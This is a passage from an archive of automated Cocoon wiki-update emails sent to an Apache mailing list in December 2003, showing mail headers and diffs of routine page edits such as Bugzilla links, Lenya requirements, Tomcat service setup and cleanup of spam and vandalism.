http://java.sun.com/xml/ns/portlet/portlet-app_1_0.xsd"> Page: http://wiki.cocoondev.org/Wiki.jsp?page=ProjectManagement , version: 5 on Mon Dec 8 16:33:30 2003 by ReinhardPoetz - these blocks definitely stop a release because of broken core functionality ? ^^^^ + these bugs definitely stop a release because of broken core functionality ? ^^ From [email protected] Mon Dec 08 21:00:12 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96259 invoked from network); 8 Dec 2003 21:00:12 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 8 Dec 2003 21:00:12 -0000 Received: (qmail 4634 invoked by uid 500); 8 Dec 2003 21:00:00 -0000 Delivered-To: [email protected] Received: (qmail 4616 invoked by uid 500); 8 Dec 2003 21:00:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 4532 invoked from network); 8 Dec 2003 20:59:59 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 8 Dec 2003 20:59:59 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB8L03p27045 for <[email protected]>; Mon, 8 Dec 2003 22:00:03 +0100 Date: Mon, 8 Dec 2003 22:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Lenya1.2 Mon Dec 8 22:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Lenya1.2 , version: 7 on Mon Dec 8 20:32:40 2003 by AndreasKuckartz + + [Bugzilla entries which need to be resolved for milestone 1.2|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Lenya&target_milestone=---&target_milestone=1.0&target_milestone=1.2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=noop&type0-0-0=noop&value0-0-0=&cmdtype=doit] - [Bugzilla entries which need to be resolved for milestone 1.2|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Lenya&target_milestone=---&target_milestone=1.0&target_milestone=1.2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=noop&type0-0-0=noop&value0-0-0=&cmdtype=doit] + I strongly agree! -- Andreas Kuckartz From [email protected] Tue Dec 09 01:00:27 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91333 invoked from network); 9 Dec 2003 01:00:26 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 9 Dec 2003 01:00:26 -0000 Received: (qmail 70223 invoked by uid 500); 9 Dec 2003 01:00:11 -0000 Delivered-To: [email protected] Received: (qmail 70138 invoked by uid 500); 9 Dec 2003 01:00:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 70126 invoked from network); 9 Dec 2003 01:00:10 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 9 Dec 2003 01:00:10 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB910Hp27141 for <[email protected]>; Tue, 9 Dec 2003 02:00:17 +0100 Date: Tue, 9 Dec 2003 02:00:17 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] FirstFridayDecember2003 FirstFriday ProjectManagement HowWeUseBugzilla Tue Dec 9 02:00:16 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=FirstFridayDecember2003 , version: 21 on Tue Dec 9 00:42:18 2003 by DavidCrossley - * At 17.30 GMT there were...93 bugs left. A new query in [BugzillaQueries] shows which bugs have been changed in the last two days (right now: not many). ? ^^^ ---------- ^^ ^^^^ ^^ ----- + * At 17.30 GMT there were...93 bugs left. The [ProjectManagement] page shows which bugs have been changed in the last two days (right now: not many). ? ^^ ^^^^^^^^^^^ ^^^^^^^^ ^ Page: http://wiki.cocoondev.org/Wiki.jsp?page=FirstFriday , version: 21 on Tue Dec 9 00:45:49 2003 by DavidCrossley - * Study the lists of open bugs and patches using [BugzillaQueries]. + * Study the lists of open bugs and patches using [BugzillaQueries|ProjectManagement]. ? ++++++++++++++++++ Page: http://wiki.cocoondev.org/Wiki.jsp?page=ProjectManagement , version: 6 on Tue Dec 9 00:37:15 2003 by DavidCrossley + **See [How to Prepare a Patch|http://cocoon.apache.org/2.1/howto/howto-patch.html] and [How to Contribute a Patch via Bugzilla|http://cocoon.apache.org/2.1/howto/howto-bugzilla.html]. - Every [first friday|FirstFriday] in a month we meet for 'virtual hackatons'. + Every [first friday|FirstFriday] in a month we meet for 'virtual hackathons'. ? + - As you found this page you already know that we have set up a Wiki for our documentation. If you want to add docs to the official documentation have a look at our [Documentation HowTo|http://cocoon.apache.org/2.1/howto/index.html#Documentation]. ? ^^ - + As you found this page you already know that we have set up a Wiki for some of the documentation. If you want to enhance or add docs to the [official documentation|http://cocoon.apache.org/] have a look at our [Documentation HowTo|http://cocoon.apache.org/2.1/howto/index.html#Documentation] and [How to Prepare a Patch|http://cocoon.apache.org/2.1/howto/howto-patch.html]. ? + ^^^^^^^^^ +++++++++++ + +++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++ Page: http://wiki.cocoondev.org/Wiki.jsp?page=HowWeUseBugzilla , version: 19 on Tue Dec 9 00:43:14 2003 by DavidCrossley - Note that there are some prepared [BugzillaQueries] ready for your enjoyment. + Note that there are some prepared [BugzillaQueries|ProjectManagement] ready for your enjoyment. ? ++++++++++++++++++ From [email protected] Tue Dec 09 02:00:13 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13718 invoked from network); 9 Dec 2003 02:00:13 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 9 Dec 2003 02:00:13 -0000 Received: (qmail 36560 invoked by uid 500); 9 Dec 2003 01:59:57 -0000 Delivered-To: [email protected] Received: (qmail 36421 invoked by uid 500); 9 Dec 2003 01:59:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 36410 invoked from network); 9 Dec 2003 01:59:55 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 9 Dec 2003 01:59:55 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB9202p27168 for <[email protected]>; Tue, 9 Dec 2003 03:00:03 +0100 Date: Tue, 9 Dec 2003 03:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] People Tue Dec 9 03:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=People , version: 224 on Tue Dec 9 02:05:02 2003 by 161.129.204.104 - * [Tim Larson] -- General software hacker + * [Tim Larson] -- General software hacker and Cocoon committer. ? ++++++++++++++++++++++ From [email protected] Tue Dec 09 03:00:15 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 43036 invoked from network); 9 Dec 2003 03:00:15 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 9 Dec 2003 03:00:15 -0000 Received: (qmail 91242 invoked by uid 500); 9 Dec 2003 02:59:56 -0000 Delivered-To: [email protected] Received: (qmail 91223 invoked by uid 500); 9 Dec 2003 02:59:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 91212 invoked from network); 9 Dec 2003 02:59:56 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 9 Dec 2003 02:59:56 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB9304p27195 for <[email protected]>; Tue, 9 Dec 2003 04:00:04 +0100 Date: Tue, 9 Dec 2003 04:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] People Tue Dec 9 04:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=People , version: 224 on Tue Dec 9 02:05:02 2003 by 161.129.204.104 - * [Tim Larson] -- General software hacker + * [Tim Larson] -- General software hacker and Cocoon committer. ? ++++++++++++++++++++++ From [email protected] Tue Dec 09 08:00:15 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 39531 invoked from network); 9 Dec 2003 08:00:15 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 9 Dec 2003 08:00:15 -0000 Received: (qmail 30289 invoked by uid 500); 9 Dec 2003 07:59:51 -0000 Delivered-To: [email protected] Received: (qmail 30265 invoked by uid 500); 9 Dec 2003 07:59:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30253 invoked from network); 9 Dec 2003 07:59:51 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 9 Dec 2003 07:59:51 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB9802p27671 for <[email protected]>; Tue, 9 Dec 2003 09:00:02 +0100 Date: Tue, 9 Dec 2003 09:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaRepositoryRequirements Tue Dec 9 09:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaRepositoryRequirements , version: 18 on Tue Dec 9 08:03:56 2003 by RolfKulemann - # create collection of documents ? ^ + # Create collection of documents ? ^ - # open and save collections of assets ? ^ + # Open and save collections of assets ? ^ - # *simple* versioning ? ^^ - + # Simple versioning ? ^ From [email protected] Tue Dec 09 09:00:16 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81219 invoked from network); 9 Dec 2003 09:00:16 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 9 Dec 2003 09:00:16 -0000 Received: (qmail 16901 invoked by uid 500); 9 Dec 2003 08:59:51 -0000 Delivered-To: [email protected] Received: (qmail 16883 invoked by uid 500); 9 Dec 2003 08:59:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 16872 invoked from network); 9 Dec 2003 08:59:50 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 9 Dec 2003 08:59:50 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB9902p27716 for <[email protected]>; Tue, 9 Dec 2003 10:00:02 +0100 Date: Tue, 9 Dec 2003 10:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaRepositoryRequirements Tue Dec 9 10:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaRepositoryRequirements , version: 19 on Tue Dec 9 08:23:51 2003 by RolfKulemann + * [content management system for apache projects, codenamed "Doco"|http://wiki.cocoondev.org/Wiki.jsp?page=Doco] From [email protected] Tue Dec 09 14:00:08 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 48095 invoked from network); 9 Dec 2003 14:00:08 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 9 Dec 2003 14:00:08 -0000 Received: (qmail 68460 invoked by uid 500); 9 Dec 2003 14:00:04 -0000 Delivered-To: [email protected] Received: (qmail 68421 invoked by uid 500); 9 Dec 2003 14:00:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 68408 invoked from network); 9 Dec 2003 14:00:04 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 9 Dec 2003 14:00:04 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB9E04p27888 for <[email protected]>; Tue, 9 Dec 2003 15:00:04 +0100 Date: Tue, 9 Dec 2003 15:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] ProjectManagement Tutorials Tue Dec 9 15:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=ProjectManagement , version: 7 on Tue Dec 9 13:29:55 2003 by ReinhardPoetz + **[add a new enhancement issue|http://nagoya.apache.org/bugzilla/enter_bug.cgi?reporter=&product=Cocoon+2&version=Current+CVS+2.1&rep_platform=Other&op_sys=other&priority=Other&bug_severity=Enhancement&bug_status=NEW&assigned_to=&cc=&bug_file_loc=&short_desc=&comment=&maketemplate=Remember+values+as+bookmarkable+template&form_name=enter_bug] - **[add a new enhancement issue|http://nagoya.apache.org/bugzilla/enter_bug.cgi?reporter=&product=Cocoon+2&version=Current+CVS+2.1&rep_platform=Other&op_sys=other&priority=Other&bug_severity=Enhancement&bug_status=NEW&assigned_to=&cc=&bug_file_loc=&short_desc=&comment=&maketemplate=Remember+values+as+bookmarkable+template&form_name=enter_bug] Page: http://wiki.cocoondev.org/Wiki.jsp?page=Tutorials , version: 59 on Tue Dec 9 13:21:07 2003 by 161.129.204.104 - *[Texaswi$e with Cocoon2 |http://www.texaswise.com/article.php3?id_article=22] --Texaswise. ? --------------------------- ^ + *[Texaswi$e with Cocoon2 |http://www.texaswise.com] --Texaswi$e. ? ^ From [email protected] Tue Dec 09 15:00:07 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86523 invoked from network); 9 Dec 2003 15:00:07 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 9 Dec 2003 15:00:07 -0000 Received: (qmail 1800 invoked by uid 500); 9 Dec 2003 15:00:03 -0000 Delivered-To: [email protected] Received: (qmail 1656 invoked by uid 500); 9 Dec 2003 15:00:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 1645 invoked from network); 9 Dec 2003 15:00:02 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 9 Dec 2003 15:00:02 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB9F02p27917 for <[email protected]>; Tue, 9 Dec 2003 16:00:03 +0100 Date: Tue, 9 Dec 2003 16:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Embedding_SVG_Fonts Tue Dec 9 16:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Embedding_SVG_Fonts , version: 22 on Tue Dec 9 14:45:31 2003 by 161.129.204.104 - !Introduction + !Introduction. ? + From [email protected] Tue Dec 09 18:00:17 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96454 invoked from network); 9 Dec 2003 18:00:17 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 9 Dec 2003 18:00:17 -0000 Received: (qmail 87829 invoked by uid 500); 9 Dec 2003 18:00:01 -0000 Delivered-To: [email protected] Received: (qmail 87777 invoked by uid 500); 9 Dec 2003 18:00:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 87668 invoked from network); 9 Dec 2003 18:00:00 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 9 Dec 2003 18:00:00 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB9I02p27996 for <[email protected]>; Tue, 9 Dec 2003 19:00:02 +0100 Date: Tue, 9 Dec 2003 19:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Tutorials Tue Dec 9 19:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Tutorials , version: 60 on Tue Dec 9 17:49:44 2003 by JoergHeinicke - Application Running on Cocoon - - *[Texaswi$e with Cocoon2 |http://www.texaswise.com] --Texaswi$e. - From [email protected] Wed Dec 10 07:00:16 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 39041 invoked from network); 10 Dec 2003 07:00:16 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 10 Dec 2003 07:00:16 -0000 Received: (qmail 38950 invoked by uid 500); 10 Dec 2003 06:59:53 -0000 Delivered-To: [email protected] Received: (qmail 38927 invoked by uid 500); 10 Dec 2003 06:59:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38916 invoked from network); 10 Dec 2003 06:59:52 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 10 Dec 2003 06:59:52 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBA702p28656 for <[email protected]>; Wed, 10 Dec 2003 08:00:03 +0100 Date: Wed, 10 Dec 2003 08:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] JacobJ Wed Dec 10 08:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=JacobJ , version: 13 on Wed Dec 10 06:29:01 2003 by 161.129.204.104 - [b | http://www.baby-sleep.us baby sleep!] ? ------------ + [b | http://www.baby-sleep.us] From [email protected] Wed Dec 10 08:00:17 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 62157 invoked from network); 10 Dec 2003 08:00:17 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 10 Dec 2003 08:00:17 -0000 Received: (qmail 94257 invoked by uid 500); 10 Dec 2003 07:59:53 -0000 Delivered-To: [email protected] Received: (qmail 94219 invoked by uid 500); 10 Dec 2003 07:59:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 94201 invoked from network); 10 Dec 2003 07:59:52 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 10 Dec 2003 07:59:52 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBA803p28689 for <[email protected]>; Wed, 10 Dec 2003 09:00:03 +0100 Date: Wed, 10 Dec 2003 09:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] JacobJ Wed Dec 10 09:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=JacobJ , version: 15 on Wed Dec 10 07:15:35 2003 by BertrandDelacretaz - [b | http://cocoon.apache.org/] - From [email protected] Wed Dec 10 09:00:17 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 99339 invoked from network); 10 Dec 2003 09:00:16 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 10 Dec 2003 09:00:16 -0000 Received: (qmail 56315 invoked by uid 500); 10 Dec 2003 08:59:51 -0000 Delivered-To: [email protected] Received: (qmail 56282 invoked by uid 500); 10 Dec 2003 08:59:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 56271 invoked from network); 10 Dec 2003 08:59:50 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 10 Dec 2003 08:59:50 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBA902p28735 for <[email protected]>; Wed, 10 Dec 2003 10:00:02 +0100 Date: Wed, 10 Dec 2003 10:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] WebDAVmod_dav Wed Dec 10 10:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=WebDAVmod_dav , version: 2 on Wed Dec 10 09:04:20 2003 by 161.129.204.104 + gfbxhd gh + d ùg + dgr + esgr + segrer From [email protected] Wed Dec 10 10:00:17 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 24726 invoked from network); 10 Dec 2003 10:00:17 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 10 Dec 2003 10:00:17 -0000 Received: (qmail 22498 invoked by uid 500); 10 Dec 2003 09:59:51 -0000 Delivered-To: [email protected] Received: (qmail 22469 invoked by uid 500); 10 Dec 2003 09:59:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 22453 invoked from network); 10 Dec 2003 09:59:50 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 10 Dec 2003 09:59:50 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBAA03p28766 for <[email protected]>; Wed, 10 Dec 2003 11:00:03 +0100 Date: Wed, 10 Dec 2003 11:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] WebDAVmod_dav TomcatWin32Service Wed Dec 10 11:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=WebDAVmod_dav , version: 3 on Wed Dec 10 09:16:10 2003 by ReinhardPoetz - bhncmbvncb - gfbxhd gh - d ùg - dgr - esgr - segrer + Page: http://wiki.cocoondev.org/Wiki.jsp?page=TomcatWin32Service , version: 3 on Wed Dec 10 09:29:51 2003 by 161.129.204.104 - To give the JVM more Memory use the following: ? ^^ + To give the JVM more Memory add the the following to the code above: ? ^^^^^^ ++++++++++++++++++ - ... + %TOMCAT_HOME%\bin\tomcat.exe + -install "Tomcat" %TOMCAT_JVM% + -Djava.class.path=%TOMCAT_CLASSPATH% + -Djava.endorsed.dirs=%TOMCAT_ENDORSED% + -Dcatalina.home=%TOMCAT_HOME% From [email protected] Wed Dec 10 13:00:07 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21394 invoked from network); 10 Dec 2003 13:00:06 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 10 Dec 2003 13:00:06 -0000 Received: (qmail 95414 invoked by uid 500); 10 Dec 2003 13:00:04 -0000 Delivered-To: [email protected] Received: (qmail 95305 invoked by uid 500); 10 Dec 2003 13:00:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 95294 invoked from network); 10 Dec 2003 13:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 10 Dec 2003 13:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBAD03p28854 for <[email protected]>; Wed, 10 Dec 2003 14:00:03 +0100 Date: Wed, 10 Dec 2003 14:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] WorkingWithLocales Wed Dec 10 14:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=WorkingWithLocales , version: 5 on Wed Dec 10 13:05:17 2003 by JeremyQuinn - * i18n Documentation: [WIKI|I18NTransformer] [Cocoon|http://cocoon.apache.org/2.1/userdocs/transformers/i18n-transformer.html] ? ^^^ + * i18n Documentation: [Wiki|I18NTransformer] or [Cocoon|http://cocoon.apache.org/2.1/userdocs/transformers/i18n-transformer.html] ? ^^^ +++ From [email protected] Wed Dec 10 14:00:11 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54230 invoked from network); 10 Dec 2003 14:00:10 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 10 Dec 2003 14:00:10 -0000 Received: (qmail 95834 invoked by uid 500); 10 Dec 2003 14:00:06 -0000 Delivered-To: [email protected] Received: (qmail 95795 invoked by uid 500); 10 Dec 2003 14:00:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 95769 invoked from network); 10 Dec 2003 14:00:05 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by 